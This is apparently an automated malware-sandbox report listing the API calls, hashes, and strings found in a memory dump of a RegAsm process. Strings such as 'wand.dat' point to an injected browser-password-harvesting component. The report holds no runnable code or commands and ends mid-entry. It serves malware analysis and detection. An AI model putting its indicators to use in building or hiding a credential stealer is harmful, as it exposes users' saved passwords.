                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                        • API String ID: 2618321458-3614832568
                                                                        • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                        • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                        • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                        • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004185FC
                                                                        • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@AttributesFilememset
                                                                        • String ID:
                                                                        • API String ID: 776155459-0
                                                                        • Opcode ID: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                                                        • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                        • Opcode Fuzzy Hash: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                                                        • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                        APIs
                                                                        • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                        • malloc.MSVCRT ref: 00417524
                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                                        • String ID:
                                                                        • API String ID: 2308052813-0
                                                                        • Opcode ID: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                                                        • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                        • Opcode Fuzzy Hash: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                                                        • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                        • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: PathTemp$??3@
                                                                        • String ID: %s\etilqs_$etilqs_
                                                                        • API String ID: 1589464350-1420421710
                                                                        • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                        • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                        • String ID: Error$Error %d: %s
                                                                        • API String ID: 313946961-1552265934
                                                                        • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                        • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                        • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                        • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                        APIs
                                                                        Strings
                                                                        • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                        • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                        • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                        • API String ID: 3510742995-272990098
                                                                        • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                        • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                        • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                        • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpymemset
                                                                        • String ID: gj
                                                                        • API String ID: 1297977491-4203073231
                                                                        • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                        • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                        • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                        • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                        APIs
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                                          • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                                                        • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                        • Opcode Fuzzy Hash: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                                                        • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                        APIs
                                                                        • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                        • malloc.MSVCRT ref: 004174BD
                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                                        • String ID:
                                                                        • API String ID: 2903831945-0
                                                                        • Opcode ID: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                                                        • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                        • Opcode Fuzzy Hash: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                                                        • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0040D453
                                                                        • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                        • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                        • String ID:
                                                                        • API String ID: 4247780290-0
                                                                        • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                        • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                        • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                        • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                        APIs
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                        • memset.MSVCRT ref: 004450CD
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                        • String ID:
                                                                        • API String ID: 1471605966-0
                                                                        • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                        • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                        APIs
                                                                        • wcscpy.MSVCRT ref: 0044475F
                                                                        • wcscat.MSVCRT ref: 0044476E
                                                                        • wcscat.MSVCRT ref: 0044477F
                                                                        • wcscat.MSVCRT ref: 0044478E
                                                                          • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                          • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                          • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                          • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                        • String ID: \StringFileInfo\
                                                                        • API String ID: 102104167-2245444037
                                                                        • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                        • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                        • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                        • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                        • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                        • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                        • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$??3@
                                                                        • String ID: g4@
                                                                        • API String ID: 3314356048-2133833424
                                                                        • Opcode ID: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                                                        • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                        • Opcode Fuzzy Hash: 736b2a0850d57b1886aaef609728f86ad4ae4702e86aed8cee47d08aa5f40c62
                                                                        • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004100FB
                                                                        • memset.MSVCRT ref: 00410112
                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                        • String ID: </%s>
                                                                        • API String ID: 3400436232-259020660
                                                                        • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                        • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040D58D
                                                                        • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                        • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumTextWindowWindowsmemset
                                                                        • String ID: caption
                                                                        • API String ID: 1523050162-4135340389
                                                                        • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                        • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                        • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                        • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                        APIs
                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                        • String ID: MS Sans Serif
                                                                        • API String ID: 210187428-168460110
                                                                        • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                        • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$memcmp
                                                                        • String ID:
                                                                        • API String ID: 3384217055-0
                                                                        • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                        • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                        • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                        • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040560C
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                          • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                          • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                          • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                                          • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                          • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                                          • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                        • String ID: *.*$dat$wand.dat
                                                                        • API String ID: 2618321458-1828844352
                                                                        • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                        • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                        • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                        • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00412057
                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                        • String ID:
                                                                        • API String ID: 3550944819-0
                                                                        • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                        • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040A8E2
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                          • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                        • memcpy.MSVCRT ref: 0040A94F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$memcpy$mallocwcslen
                                                                        • String ID:
                                                                        • API String ID: 3023356884-0
                                                                        • Opcode ID: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                        • Opcode Fuzzy Hash: 7c3bf55650e46ec6d986ae3d53e06d3ea5d21062730a6393b00670857d628b62
                                                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                        APIs
                                                                        • wcslen.MSVCRT ref: 0040B1DE
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                          • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                        • memcpy.MSVCRT ref: 0040B248
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@$memcpy$mallocwcslen
                                                                        • String ID:
                                                                        • API String ID: 3023356884-0
                                                                        • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                        • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: @
                                                                        • API String ID: 3510742995-2766056989
                                                                        • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                        • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                        • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                        • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                        APIs
                                                                        • strlen.MSVCRT ref: 0040B0D8
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                                          • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
